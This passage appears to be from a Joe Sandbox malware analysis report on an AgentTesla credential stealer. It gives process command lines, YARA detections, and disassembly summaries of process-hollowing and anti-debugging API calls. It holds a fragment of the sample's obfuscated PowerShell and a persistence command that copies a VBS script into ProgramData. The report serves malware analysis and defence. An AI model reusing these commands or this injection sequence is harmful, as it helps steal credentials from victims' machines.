([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')"
                                                                        Imagebase:0x7ff741d30000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:12
                                                                        Start time:11:09:17
                                                                        Start date:07/10/2024
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\alcatifa.vbs"
                                                                        Imagebase:0x7ff6ab480000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:13
                                                                        Start time:11:09:17
                                                                        Start date:07/10/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff75da10000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:14
                                                                        Start time:11:09:19
                                                                        Start date:07/10/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                        Imagebase:0x7b0000
                                                                        File size:43'008 bytes
                                                                        MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2553669358.0000000002B05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:16
                                                                        Start time:12:11:27
                                                                        Start date:07/10/2024
                                                                        Path:C:\Windows\System32\wscript.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\alcatifa.vbs"
                                                                        Imagebase:0x7ff629140000
                                                                        File size:170'496 bytes
                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:17
                                                                        Start time:12:11:36
                                                                        Start date:07/10/2024
                                                                        Path:C:\Windows\System32\wscript.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\alcatifa.vbs"
                                                                        Imagebase:0x7ff629140000
                                                                        File size:170'496 bytes
                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Executed Functions

                                                                          Function 00007FFAAC3937B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.1507790413.00007FFAAC390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC390000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffaac390000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                          • Instruction ID: 0c37fb50f6aea14b1a4d05b189d0c8b153c1758ea530b8c5491b239386b534a1
                                                                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                          • Instruction Fuzzy Hash: 7801677111CB0D8FD744EF0CE451AA6B7E0FB99364F10056DE58AC3661DA36E882CB45

                                                                          Non-executed Functions

                                                                          Function 00007FFAAC3912AD Relevance: .3, Instructions: 270COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.1507790413.00007FFAAC390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC390000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffaac390000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4113d55f52f92713a7f2ca993c4542794b99f4bbb5d882398008394e1e378361
                                                                          • Instruction ID: ed26b1772a275f3977fbe9ac2f2ce2680e6def9b0234fddc3269ce409f52eebf
                                                                          • Opcode Fuzzy Hash: 4113d55f52f92713a7f2ca993c4542794b99f4bbb5d882398008394e1e378361
                                                                          • Instruction Fuzzy Hash: 3981805790FBD28FF357577C58B55D5BF60EE5326870940F7C1C99A093D80AA80A83B1

                                                                          Execution Graph

                                                                          Execution Coverage:6.2%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:18
                                                                          Total number of Limit Nodes:2
                                                                          execution_graph 4836 7ffaac38bca2 4837 7ffaac38bcbf WriteProcessMemory 4836->4837 4839 7ffaac38bd81 4837->4839 4840 7ffaac38b985 4841 7ffaac38b993 Wow64SetThreadContext 4840->4841 4843 7ffaac38ba63 4841->4843 4844 7ffaac38bdb5 4845 7ffaac38bdc3 ResumeThread 4844->4845 4847 7ffaac38be5b 4845->4847 4848 7ffaac38b5cc 4849 7ffaac38b5ee CreateProcessW 4848->4849 4851 7ffaac38b883 4849->4851 4853 7ffaac38b8de 4851->4853 4854 7ffaac38b916 4851->4854 4855 7ffaac38b950 4854->4855 4856 7ffaac38b93c 4854->4856 4855->4853 4856->4855 4857 7ffaac38ba2f Wow64SetThreadContext 4856->4857 4858 7ffaac38ba63 4857->4858 4858->4853

                                                                          Executed Functions

                                                                          Function 00007FFAAC4590CD Relevance: 2.4, Instructions: 2436COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 7ffaac4590cd-7ffaac4590f3 1 7ffaac459172-7ffaac459173 0->1 2 7ffaac4590f5-7ffaac459112 0->2 3 7ffaac45917d-7ffaac459182 1->3 4 7ffaac459175-7ffaac45917b 1->4 8 7ffaac459189-7ffaac45918b 2->8 9 7ffaac459114 2->9 6 7ffaac459188 3->6 7 7ffaac4592e4-7ffaac4592ee 3->7 4->3 6->8 13 7ffaac4592f0-7ffaac4592fc 7->13 14 7ffaac4592fd-7ffaac459340 7->14 11 7ffaac45918d-7ffaac459196 8->11 12 7ffaac4591a2-7ffaac4591a6 8->12 15 7ffaac459116 9->15 16 7ffaac459118-7ffaac459154 9->16 11->12 12->7 21 7ffaac4591ac-7ffaac4591e3 12->21 26 7ffaac459343-7ffaac45939d 14->26 15->16 25 7ffaac45915a-7ffaac459164 16->25 16->26 39 7ffaac459207 21->39 40 7ffaac4591e5-7ffaac459205 21->40 25->3 28 7ffaac459166-7ffaac45916f 25->28 41 7ffaac45939f-7ffaac4593b6 26->41 42 7ffaac4593c8-7ffaac4593f5 26->42 28->1 43 7ffaac459209-7ffaac45920b 39->43 40->43 54 7ffaac4593ba-7ffaac4593c6 41->54 55 7ffaac4593b8 41->55 57 7ffaac4593f7 42->57 58 7ffaac4593f8-7ffaac459409 42->58 43->7 47 7ffaac459211-7ffaac459214 43->47 49 7ffaac45922b 47->49 50 7ffaac459216-7ffaac459229 47->50 56 7ffaac45922d-7ffaac45922f 49->56 50->56 54->42 55->54 56->7 59 7ffaac459235-7ffaac45926f 56->59 57->58 60 7ffaac45940b 58->60 61 7ffaac45940c-7ffaac459424 58->61 71 7ffaac459271-7ffaac45927e 59->71 72 7ffaac459288-7ffaac45928e 59->72 60->61 67 7ffaac459426 61->67 68 7ffaac459428-7ffaac45945a 61->68 67->68 71->72 76 7ffaac459280-7ffaac459286 71->76 74 7ffaac459290-7ffaac4592a8 72->74 75 7ffaac4592aa-7ffaac4592ad 72->75 74->75 78 7ffaac4592b4-7ffaac4592bd 75->78 76->72 79 7ffaac4592bf-7ffaac4592d4 78->79 80 7ffaac4592d6-7ffaac4592e3 78->80 79->80
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1473224907.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffaac450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 22162bada3440246ed4578c3f7649b295fb70b33789ae61efab99eeea8dba2fc
                                                                          • Instruction ID: 080e0f94b9aff6c1d6f8d7e9cad84ba6af911fbf9f80bafa29ded50622c608b0
                                                                          • Opcode Fuzzy Hash: 22162bada3440246ed4578c3f7649b295fb70b33789ae61efab99eeea8dba2fc
                                                                          • Instruction Fuzzy Hash: 92C10562A0EBCA8FF756972848295B47FD1DF67224B0881FED08DC71E3DD189C0A8395
                                                                          Function 00007FFAAC38B5CC Relevance: 1.9, APIs: 1, Instructions: 355processCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1472576527.00007FFAAC380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC380000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffaac380000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: e431fb29cc8bd5295d32186df32924ab753a286e6eca0cd05190a28c644f9d22
                                                                          • Instruction ID: 5d5d08ae5539b119d84ca07a58128cd75a42ec2dd9adb8d9acb3dfe779b9c2f8
                                                                          • Opcode Fuzzy Hash: e431fb29cc8bd5295d32186df32924ab753a286e6eca0cd05190a28c644f9d22
                                                                          • Instruction Fuzzy Hash: E1C1E63180DB988FDB56DB28CC55AE9BFF0EF5A310F0442DBD049D7252CA34A985CB91
                                                                          Function 00007FFAAC38B916 Relevance: 1.7, APIs: 1, Instructions: 161COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1472576527.00007FFAAC380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC380000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffaac380000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b576ed9ba16516f239cb7a275dfcf4930c906b13df20e617b729a322ebad6ce3
                                                                          • Instruction ID: 654d11e2b8b257f9ddc92c4cbbcfd81363273c5a6da95decdfc2c8a6a013ac67
                                                                          • Opcode Fuzzy Hash: b576ed9ba16516f239cb7a275dfcf4930c906b13df20e617b729a322ebad6ce3
                                                                          • Instruction Fuzzy Hash: 0341E37190CB1C8FEB58DF58DC4AAF9BBE0EB96321F00416BD40DC6156DA34A94A8B91
                                                                          Function 00007FFAAC38BCA2 Relevance: 1.6, APIs: 1, Instructions: 133injectionCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 125 7ffaac38bca2-7ffaac38bd30 128 7ffaac38bd32-7ffaac38bd37 125->128 129 7ffaac38bd3a-7ffaac38bd7f WriteProcessMemory 125->129 128->129 130 7ffaac38bd87-7ffaac38bdb1 129->130 131 7ffaac38bd81 129->131 131->130
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1472576527.00007FFAAC380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC380000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffaac380000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 4ab737e2a8395c33da337a4496bb6edce669d84c67def08e475f15e791390349
                                                                          • Instruction ID: 790256e08b86d5296bc8cc0c74bc1576f0da6281544e51941f61bc9b03d5e3d4
                                                                          • Opcode Fuzzy Hash: 4ab737e2a8395c33da337a4496bb6edce669d84c67def08e475f15e791390349
                                                                          • Instruction Fuzzy Hash: 9F31B77191CB588FDB18DF5898456F9BBE0FB55321F04826FD049D3252CB74A8498B91
                                                                          Function 00007FFAAC38B985 Relevance: 1.6, APIs: 1, Instructions: 132threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 132 7ffaac38b985-7ffaac38b991 133 7ffaac38b993-7ffaac38b99b 132->133 134 7ffaac38b99c-7ffaac38ba25 132->134 133->134 137 7ffaac38ba27-7ffaac38ba2c 134->137 138 7ffaac38ba2f-7ffaac38ba61 Wow64SetThreadContext 134->138 137->138 139 7ffaac38ba63 138->139 140 7ffaac38ba69-7ffaac38ba90 138->140 139->140
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1472576527.00007FFAAC380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC380000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffaac380000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: dcd0b2eae5333c0caea7663334adb128e3009262ab25e249646861a1ff41a2ba
                                                                          • Instruction ID: 83721950b6013ab2122a1bed2e23bddcc1c84841f509d35e8b19c5766ce78b5d
                                                                          • Opcode Fuzzy Hash: dcd0b2eae5333c0caea7663334adb128e3009262ab25e249646861a1ff41a2ba
                                                                          • Instruction Fuzzy Hash: 5741083190DB888FDB16DF688C45BE97FE0EF57321F08429BD048C7157DA64A409CB92
                                                                          Function 00007FFAAC38BDB5 Relevance: 1.6, APIs: 1, Instructions: 102threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 141 7ffaac38bdb5-7ffaac38bdc1 142 7ffaac38bdc3-7ffaac38bdcb 141->142 143 7ffaac38bdcc-7ffaac38be59 ResumeThread 141->143 142->143 146 7ffaac38be5b 143->146 147 7ffaac38be61-7ffaac38be7d 143->147 146->147
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1472576527.00007FFAAC380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC380000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffaac380000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: e83cc08fe023fbfe404a57ab5c6ab03dc6fdf3a977e74fa7195033c0048a6b2a
                                                                          • Instruction ID: 8676da01ce5960473cbecac89ba5dd4632d89292e35036400462105e78fc3446
                                                                          • Opcode Fuzzy Hash: e83cc08fe023fbfe404a57ab5c6ab03dc6fdf3a977e74fa7195033c0048a6b2a
                                                                          • Instruction Fuzzy Hash: CF31E37190CA4D8FDB59DF98D845BB9BBE0FF56321F04426ED049C3662CB60A416CB91
                                                                          Function 00007FFAAC4570F5 Relevance: .6, Instructions: 596COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 252 7ffaac4570f5-7ffaac457151 258 7ffaac457198 252->258 259 7ffaac457153-7ffaac457159 252->259 261 7ffaac457199-7ffaac45719e 258->261 262 7ffaac4571a0-7ffaac4571a1 259->262 263 7ffaac45715b-7ffaac45716b 259->263 261->262 264 7ffaac4571a8-7ffaac4571b2 261->264 270 7ffaac45716e-7ffaac45717e 262->270 272 7ffaac4571a3-7ffaac4571a6 262->272 263->270 265 7ffaac4572eb-7ffaac457301 264->265 266 7ffaac4571b8-7ffaac4571c2 264->266 277 7ffaac457309-7ffaac457322 265->277 278 7ffaac457303-7ffaac457307 265->278 268 7ffaac4571db-7ffaac4571e2 266->268 269 7ffaac4571c4-7ffaac4571d9 266->269 268->265 275 7ffaac4571e8-7ffaac4571f2 268->275 269->268 270->265 276 7ffaac457184-7ffaac45718e 270->276 272->264 279 7ffaac457208-7ffaac45722b 275->279 280 7ffaac4571f4-7ffaac457207 275->280 276->264 281 7ffaac457190-7ffaac457197 276->281 282 7ffaac457399-7ffaac45739d 277->282 283 7ffaac457324 277->283 278->277 279->265 292 7ffaac457231-7ffaac45723b 279->292 280->279 281->258 281->261 286 7ffaac45739f-7ffaac4573aa 282->286 287 7ffaac457326 283->287 288 7ffaac457328-7ffaac457338 283->288 293 7ffaac4573ac-7ffaac4573b5 286->293 287->288 288->293 294 7ffaac45733a-7ffaac457342 288->294 295 7ffaac457251-7ffaac457274 292->295 296 7ffaac45723d-7ffaac45724d 292->296 298 7ffaac4573b9-7ffaac4573ce 293->298 294->298 299 7ffaac457344 294->299 304 7ffaac457275-7ffaac45728b 295->304 305 7ffaac457478-7ffaac4574ab 298->305 306 7ffaac4573d4-7ffaac4573de 298->306 302 7ffaac457346 299->302 303 7ffaac457348-7ffaac457351 299->303 302->303 307 7ffaac457398 303->307 308 7ffaac457353-7ffaac457376 303->308 304->265 318 7ffaac45728d-7ffaac457297 304->318 326 7ffaac45752a-7ffaac45752d 305->326 327 7ffaac4574ad-7ffaac4574ca 305->327 309 7ffaac4573e0-7ffaac4573ed 306->309 310 7ffaac4573f7-7ffaac457457 306->310 307->282 308->305 321 7ffaac45737c-7ffaac457386 308->321 309->310 319 7ffaac4573ef-7ffaac4573f5 309->319 348 7ffaac45746b-7ffaac457477 310->348 349 7ffaac457459-7ffaac45746a 310->349 324 7ffaac4572ad-7ffaac4572e8 318->324 325 7ffaac457299-7ffaac4572a9 318->325 319->310 321->286 322 7ffaac457388-7ffaac457394 321->322 322->307 324->265 325->304 335 7ffaac4572ab-7ffaac4572ac 325->335 332 7ffaac457530-7ffaac457540 326->332 338 7ffaac457541-7ffaac45757a 327->338 339 7ffaac4574cc 327->339 332->338 335->324 356 7ffaac457581-7ffaac457585 338->356 341 7ffaac4574ce 339->341 342 7ffaac4574d0-7ffaac4574e9 339->342 341->342 342->332 347 7ffaac4574eb-7ffaac457527 342->347 347->326 349->348 358 7ffaac45758d-7ffaac4575a5 356->358
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1473224907.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffaac450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 618a18ca847fc9a03d7fff59b33d3332c895c07223ce205bd454b4c9ee11a823
                                                                          • Instruction ID: 9872ff1bf33489b5341fe374ce1035ab6291bbcefef09b84ed446f9f1d7a0535
                                                                          • Opcode Fuzzy Hash: 618a18ca847fc9a03d7fff59b33d3332c895c07223ce205bd454b4c9ee11a823
                                                                          • Instruction Fuzzy Hash: EBF1F26191EB8ACFE79A972888595703FD1DF67224B1841FED08DCB1A3DC19EC4AC385
                                                                          Function 00007FFAAC45077C Relevance: .2, Instructions: 159COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1473224907.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffaac450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 753e8850b2eb32c657d23c7c13d8bf567d5c74df0320e57177947ac45cbb639c
                                                                          • Instruction ID: a371303272936a4ad2665c7516e301ca12a12c607cd91f7e5731523fe7dfd2e2
                                                                          • Opcode Fuzzy Hash: 753e8850b2eb32c657d23c7c13d8bf567d5c74df0320e57177947ac45cbb639c
                                                                          • Instruction Fuzzy Hash: 7241C272A0DB8D8FEB549F1CA8066A87FE0EF46324F0441AFE44DC3192DA25EC4587C5
                                                                          Function 00007FFAAC45919A Relevance: .1, Instructions: 149COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 428 7ffaac45919a-7ffaac4591a6 430 7ffaac4591ac-7ffaac4591e3 428->430 431 7ffaac4592e4-7ffaac4592ee 428->431 443 7ffaac459207 430->443 444 7ffaac4591e5-7ffaac459205 430->444 432 7ffaac4592f0-7ffaac4592fc 431->432 433 7ffaac4592fd-7ffaac45939d 431->433 461 7ffaac45939f-7ffaac4593b6 433->461 462 7ffaac4593c8-7ffaac4593f5 433->462 445 7ffaac459209-7ffaac45920b 443->445 444->445 445->431 448 7ffaac459211-7ffaac459214 445->448 451 7ffaac45922b 448->451 452 7ffaac459216-7ffaac459229 448->452 455 7ffaac45922d-7ffaac45922f 451->455 452->455 455->431 457 7ffaac459235-7ffaac45926f 455->457 474 7ffaac459271-7ffaac45927e 457->474 475 7ffaac459288-7ffaac45928e 457->475 469 7ffaac4593ba-7ffaac4593c6 461->469 470 7ffaac4593b8 461->470 472 7ffaac4593f7 462->472 473 7ffaac4593f8-7ffaac459409 462->473 469->462 470->469 472->473 476 7ffaac45940b 473->476 477 7ffaac45940c-7ffaac459424 473->477 474->475 483 7ffaac459280-7ffaac459286 474->483 481 7ffaac459290-7ffaac4592a8 475->481 482 7ffaac4592aa-7ffaac4592ad 475->482 476->477 484 7ffaac459426 477->484 485 7ffaac459428-7ffaac45945a 477->485 481->482 487 7ffaac4592b4-7ffaac4592bd 482->487 483->475 484->485 488 7ffaac4592bf-7ffaac4592d4 487->488 489 7ffaac4592d6-7ffaac4592e3 487->489 488->489
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1473224907.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffaac450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9a94a10608b798a561ead62cb30700c6b7a518863b6351826157f41dd03c0c45
                                                                          • Instruction ID: 651d9a76e047736d9e80d083a80139bf0da8b711f2e98572a1c1105e7791b090
                                                                          • Opcode Fuzzy Hash: 9a94a10608b798a561ead62cb30700c6b7a518863b6351826157f41dd03c0c45
                                                                          • Instruction Fuzzy Hash: 08413866E0FB8B4BF799572808695B876C1DFA3268B4885BDE44EC31E2DD1CDC0A42C5
                                                                          Function 00007FFAAC450429 Relevance: .1, Instructions: 123COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 494 7ffaac450429-7ffaac450450 498 7ffaac450510-7ffaac450528 494->498 499 7ffaac450456-7ffaac450459 494->499 499->498 501 7ffaac45045f-7ffaac450477 499->501 503 7ffaac450490-7ffaac450494 501->503 504 7ffaac450479-7ffaac45048e 501->504 503->498 506 7ffaac450496-7ffaac450499 503->506 504->503 507 7ffaac4504c0 506->507 508 7ffaac45049b-7ffaac4504be 506->508 509 7ffaac4504c2-7ffaac4504c4 507->509 508->509 509->498 511 7ffaac4504c6-7ffaac4504d9 509->511 514 7ffaac4504e0-7ffaac4504e9 511->514 515 7ffaac4504eb-7ffaac4504f8 514->515 516 7ffaac450502-7ffaac45050f 514->516 515->516 518 7ffaac4504fa-7ffaac450500 515->518 518->516
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1473224907.00007FFAAC450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC450000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffaac450000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6aa128311fe3f9435a81707d22fd660fef0fa7bf0b5636f7eb2e9a131dd797a0
                                                                          • Instruction ID: 11dbf3cdc417f13a3523e04ee88f772e2747b3740e43dad5ad93c330819a3110
                                                                          • Opcode Fuzzy Hash: 6aa128311fe3f9435a81707d22fd660fef0fa7bf0b5636f7eb2e9a131dd797a0
                                                                          • Instruction Fuzzy Hash: FB31D626B0EA4E8FF794DB6C54596747AC1FF56228F4481B9D54DC3186DE18EC0943C4

                                                                          Execution Graph

                                                                          Execution Coverage:8.9%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:21.4%
                                                                          Total number of Nodes:14
                                                                          Total number of Limit Nodes:2
                                                                          execution_graph 27847 639a6e8 27848 639a72e GetCurrentProcess 27847->27848 27850 639a779 27848->27850 27851 639a780 GetCurrentThread 27848->27851 27850->27851 27852 639a7bd GetCurrentProcess 27851->27852 27853 639a7b6 27851->27853 27855 639a7f3 27852->27855 27853->27852 27854 639a81b GetCurrentThreadId 27856 639a84c 27854->27856 27855->27854 27842 2937070 27843 29370b4 CheckRemoteDebuggerPresent 27842->27843 27844 29370f6 27843->27844 27845 639a930 DuplicateHandle 27846 639a9c6 27845->27846

                                                                          Executed Functions

                                                                          Function 02937070 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1936 2937070-29370f4 CheckRemoteDebuggerPresent 1938 29370f6-29370fc 1936->1938 1939 29370fd-2937138 1936->1939 1938->1939
                                                                          APIs
                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 029370E7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2552618466.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_2930000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0
                                                                          • Opcode ID: 633fd902fc517831e319e30eb80ba44133284ff177f467b0543052fef320bbb7
                                                                          • Instruction ID: 87977b3acc81b8935abfefd4ea29ef3e7e7388cd9da55b7f41fc31e00e6a005f
                                                                          • Opcode Fuzzy Hash: 633fd902fc517831e319e30eb80ba44133284ff177f467b0543052fef320bbb7
                                                                          • Instruction Fuzzy Hash: 052157B2C01259CFDB14CFAAD884BEEFBF4AF48224F14841AE459A3350C738A944CF65
                                                                          Function 0639A6E2 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 663 639a6e2-639a777 GetCurrentProcess 668 639a779-639a77f 663->668 669 639a780-639a7b4 GetCurrentThread 663->669 668->669 670 639a7bd-639a7f1 GetCurrentProcess 669->670 671 639a7b6-639a7bc 669->671 673 639a7fa-639a815 call 639a8b8 670->673 674 639a7f3-639a7f9 670->674 671->670 676 639a81b-639a84a GetCurrentThreadId 673->676 674->673 678 639a84c-639a852 676->678 679 639a853-639a8b5 676->679 678->679
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 0639A766
                                                                          • GetCurrentThread.KERNEL32 ref: 0639A7A3
                                                                          • GetCurrentProcess.KERNEL32 ref: 0639A7E0
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0639A839
                                                                          Memory Dump Source
